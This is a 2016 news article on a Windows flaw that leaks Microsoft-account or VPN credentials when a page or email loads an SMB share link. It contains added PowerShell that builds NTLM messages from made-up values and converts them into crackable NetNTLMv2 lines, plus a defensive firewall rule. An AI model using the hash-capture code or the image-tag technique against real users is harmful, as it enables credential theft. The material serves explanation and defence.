Attack from the '90s resurfaces more deadly than before

Aug 2, 2016 00:20 GMT  ·  By

A flaw in how Windows handles an old authentication procedure for shared network resources can leak the username and an NTLM challenge-response (a crackable password hash) for a user's Microsoft account, or for their VPN account if the victim is using a VPN to surf the Internet.

The exploit relies on an attacker embedding a link to an SMB resource (network share) inside a Web page or an email that gets viewed via Outlook.

The link does not need to be clicked. The attacker can hide it in an image tag: instead of pointing the tag at a real image, they point it at a network share hosted on a server they control (a UNC or file:// path), and the client fetches it automatically when the page or message is rendered.

Attack works via IE, Edge, or Outlook

When Internet Explorer, Edge, or Outlook loads such a link, Windows treats it as a request for a network share and, because of the way it handles authentication for shares, automatically tries to log in to the attacker's server with the current user's credentials, even though that server is on the Internet rather than on the local network.

The Microsoft account password itself is not sent in cleartext; what leaves the machine is the username together with an NTLM challenge-response derived from the password hash. Researchers showed long ago that these responses can be cracked offline by brute force, and a weak password falls quickly.
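What the server at the other end of such a link actually receives, as an added example that is not from the article and not ValdikSS's proof of concept: a PowerShell script that constructs an NTLMSSP CHALLENGE (Type 2) and AUTHENTICATE (Type 3) message pair with made-up values, then parses the Type 3 message the way a credential-capturing SMB server such as Responder or impacket's smbserver does, and prints the result in the NetNTLMv2 line format that hashcat (mode 5600) and John the Ripper accept. The username, pseudo-domain, server challenge, NTProofStr and blob bytes are all constructed for the example; the message layouts follow MS-NLMP.

```powershell
# Added example, not from the article or from ValdikSS's PoC. All values are constructed.
# Layouts follow MS-NLMP: every variable-length field is referenced by an 8-byte
# descriptor (Len u16, MaxLen u16, Offset u32, little-endian) in the fixed header.

function New-NtlmFieldDesc([int]$Len, [int]$Offset) {
    [BitConverter]::GetBytes([uint16]$Len) + [BitConverter]::GetBytes([uint16]$Len) +
        [BitConverter]::GetBytes([uint32]$Offset)
}

function Get-NtlmField([byte[]]$Msg, [int]$DescAt) {
    # Resolve a field descriptor to the bytes it points at; empty fields give an empty array.
    $len = [BitConverter]::ToUInt16($Msg, $DescAt)
    $off = [int][BitConverter]::ToUInt32($Msg, $DescAt + 4)
    if ($len -eq 0) { return ,[byte[]]@() }
    return ,[byte[]]($Msg[$off..($off + $len - 1)])
}

function ConvertTo-Hex([byte[]]$Bytes) {
    ([BitConverter]::ToString($Bytes) -replace '-', '').ToLower()
}

function New-NtlmChallenge([string]$TargetName, [byte[]]$ServerChallenge) {
    # CHALLENGE_MESSAGE: 56-byte fixed part, TargetName payload after it, no TargetInfo.
    $target = [Text.Encoding]::Unicode.GetBytes($TargetName)
    $msg  = [Text.Encoding]::ASCII.GetBytes("NTLMSSP`0") + [BitConverter]::GetBytes([uint32]2)
    $msg += New-NtlmFieldDesc $target.Length 56            # TargetNameFields at offset 12
    $msg += [BitConverter]::GetBytes([uint32]0x02000201)   # NegotiateFlags: UNICODE | NTLM | VERSION
    $msg += $ServerChallenge                                # ServerChallenge, 8 bytes at offset 24
    $msg += New-Object byte[] 8                             # Reserved at 32
    $msg += New-NtlmFieldDesc 0 (56 + $target.Length)       # TargetInfoFields at 40 (empty here)
    $msg += New-Object byte[] 8                             # Version at 48
    $msg += $target
    return [byte[]]$msg
}

function New-NtlmAuthenticate {
    param([string]$Domain, [string]$User, [string]$Workstation,
          [byte[]]$NtProofStr, [byte[]]$Blob)
    # AUTHENTICATE_MESSAGE: 88-byte fixed part (six descriptors, flags, Version, MIC),
    # then the payload sections in the order the descriptors name them.
    $enc = [Text.Encoding]::Unicode                         # NEGOTIATE_UNICODE => UTF-16LE strings
    $sections = @(
        (New-Object byte[] 24),                             # LmChallengeResponse (LMv2 omitted, zeroed)
        [byte[]]($NtProofStr + $Blob),                      # NtChallengeResponse = NTProofStr || temp blob
        $enc.GetBytes($Domain),
        $enc.GetBytes($User),
        $enc.GetBytes($Workstation)
    )
    $descs = @(); $payload = @(); $offset = 88
    foreach ($s in $sections) {
        $descs   += New-NtlmFieldDesc $s.Length $offset
        $payload += $s
        $offset  += $s.Length
    }
    $descs += New-NtlmFieldDesc 0 $offset                   # EncryptedRandomSessionKeyFields: nothing sent
    $msg  = [Text.Encoding]::ASCII.GetBytes("NTLMSSP`0") + [BitConverter]::GetBytes([uint32]3)
    $msg += $descs                                          # six descriptors at offsets 12..59
    $msg += [BitConverter]::GetBytes([uint32]0x02000201)    # NegotiateFlags at 60
    $msg += New-Object byte[] 8                             # Version at 64
    $msg += New-Object byte[] 16                            # MIC at 72 (zeroed, not verified here)
    $msg += $payload
    return [byte[]]$msg
}

function ConvertTo-NetNtlmv2Line([byte[]]$Challenge, [byte[]]$Authenticate) {
    # What a capturing server does with the pair: take the challenge it handed out from its
    # own Type 2 message and the identity plus NTLMv2 response from the client's Type 3.
    if ([Text.Encoding]::ASCII.GetString($Authenticate, 0, 7) -ne 'NTLMSSP' -or
        [BitConverter]::ToUInt32($Authenticate, 8) -ne 3) { throw 'not an NTLM AUTHENTICATE message' }
    if ([BitConverter]::ToUInt32($Challenge, 8) -ne 2) { throw 'not an NTLM CHALLENGE message' }
    $serverChallenge = [byte[]]($Challenge[24..31])
    $nt   = Get-NtlmField $Authenticate 20
    $dom  = [Text.Encoding]::Unicode.GetString((Get-NtlmField $Authenticate 28))
    $user = [Text.Encoding]::Unicode.GetString((Get-NtlmField $Authenticate 36))
    if ($nt.Length -le 24) { throw 'NTLMv1 or LM response: different format, not handled here' }
    # hashcat -m 5600 / john netntlmv2 input: USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB
    '{0}::{1}:{2}:{3}:{4}' -f $user, $dom, (ConvertTo-Hex $serverChallenge),
        (ConvertTo-Hex $nt[0..15]), (ConvertTo-Hex $nt[16..($nt.Length - 1)])
}

# Constructed capture: the challenge the attacker's share handed out and the response
# "the victim" returned. 'MicrosoftAccount' is the pseudo-domain Windows uses for users
# signed in with a Microsoft account; every byte below is arbitrary, not real data.
$serverChallenge = [byte[]](0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88)
$ntProofStr      = [byte[]](1..16)                      # 16-byte HMAC-MD5 output in a real response
$blob  = [byte[]](0x01, 0x01, 0, 0, 0, 0, 0, 0)         # RespType, HiRespType, reserved
$blob += [byte[]](0xA0..0xA7)                           # TimeStamp (8 bytes, arbitrary)
$blob += [byte[]](0xC1..0xC8)                           # ClientChallenge (8 bytes, arbitrary)
$blob += [byte[]](0, 0, 0, 0)                           # trailing reserved; AvPairs omitted

$type2 = New-NtlmChallenge -TargetName 'ATTACKER' -ServerChallenge $serverChallenge
$type3 = New-NtlmAuthenticate -Domain 'MicrosoftAccount' -User 'victim@outlook.com' `
                              -Workstation 'VICTIM-PC' -NtProofStr $ntProofStr -Blob $blob
ConvertTo-NetNtlmv2Line -Challenge $type2 -Authenticate $type3
```

The single line this prints is the entire offline-cracking input: the attacker never sees the password, but needs only enough candidate passwords to reproduce the 16-byte NTProofStr from the server challenge and blob, which is a fast HMAC-MD5 computation per guess. The function deliberately rejects 24-byte (NTLMv1/LM) responses because they use a different line format and a far weaker construction.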

This is not even new: Microsoft and the research community have known about the issue since 1997, and it has been discussed repeatedly at security conferences such as Black Hat.

Attack can indirectly leak data for many other Microsoft resources

This was a smaller problem in the past, when Windows accounts were local accounts whose username and password meant nothing outside that one machine. Beginning with Windows 8, Microsoft allowed users to sign in to their computers with a Microsoft account, and in Windows 10 this became the default, so far more users now do so.

In recent years, Microsoft has tied all of its online properties to that same Microsoft account. According to ValdikSS from ProstoVPN, this gives the old attack new teeth: a crook who captures Microsoft account credentials indirectly gains access to all sorts of services, including Skype, Xbox, OneDrive, Office 365, MSN, Bing, Azure, and more.

Even worse, if the user loads the malicious SMB resource over a VPN connection, their VPN credentials are leaked instead, allowing the crook to use the victim's VPN account.

Issue at the core of the problem not fixed after 19 years

"Microsoft successfully fixed some issues, some other issues were half-fixed, and others are not fixed at all and could be exploited up to this day," ValdikSS explains. "The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones."

ValdikSS says the easiest way to protect oneself against such attacks is to block all outgoing SMB connections (TCP port 445) in the Windows firewall, except to local networks.
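One way to put that firewall rule in place and verify it, as an added example that is not part of the article: the PowerShell below (run from an elevated prompt) creates an outbound block rule for SMB to public IPv4 space only, leaving RFC 1918, loopback and link-local destinations untouched. Windows Defender Firewall applies block rules before allow rules, so "block everything, then allow local" cannot be expressed; the block rule itself has to be scoped to the non-private ranges. The NetBIOS session port 139, which older SMB transports use, is added alongside 445; the rule name and group are this example's own choices.

```powershell
# Added example, not from the article. Outbound SMB (TCP 445 and 139) to public IPv4 space is
# blocked; private, loopback and link-local ranges are left out so LAN shares keep working.
$publicV4 = @(
    '1.0.0.0-9.255.255.255',        # skips 10.0.0.0/8
    '11.0.0.0-126.255.255.255',     # skips 127.0.0.0/8
    '128.0.0.0-169.253.255.255',    # skips 169.254.0.0/16 (link-local)
    '169.255.0.0-172.15.255.255',   # skips 172.16.0.0/12
    '172.32.0.0-192.167.255.255',   # skips 192.168.0.0/16
    '192.169.0.0-223.255.255.255'   # 224.0.0.0 and above is multicast/reserved, never a share
)

$rule = @{
    DisplayName   = 'Block outbound SMB to the Internet'   # example name, not a Windows default
    Group         = 'SMB credential leak mitigation'
    Direction     = 'Outbound'
    Protocol      = 'TCP'
    RemotePort    = 139, 445
    RemoteAddress = $publicV4
    Action        = 'Block'
    Profile       = 'Any'
}

if (-not (Get-NetFirewallRule -DisplayName $rule.DisplayName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule @rule | Out-Null
}

# Verify what the firewall actually stored: the address filter must list the public ranges,
# not "Any", or the rule would also cut off local file servers.
Get-NetFirewallRule -DisplayName $rule.DisplayName |
    Get-NetFirewallAddressFilter |
    Select-Object -ExpandProperty RemoteAddress

# Check the effect: a TCP connection to port 445 on a public address must now fail before any
# NTLM exchange can start. 1.1.1.1 is just an example of a public address.
Test-NetConnection -ComputerName 1.1.1.1 -Port 445 -InformationLevel Quiet
```

Before the rule exists the final Test-NetConnection call returns True against any Internet host that answers on 445 (the attacker's share would), and False once the rule is active. The ranges are IPv4 only; on a machine with global IPv6 connectivity, add an equivalent rule whose RemoteAddress is the global unicast range 2000::/3.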

But the best defense against this attack is not to use your Microsoft account to log into your Windows PC.

Proof-of-concept page showing the attack in action
All the accounts a hacker could own via this exploit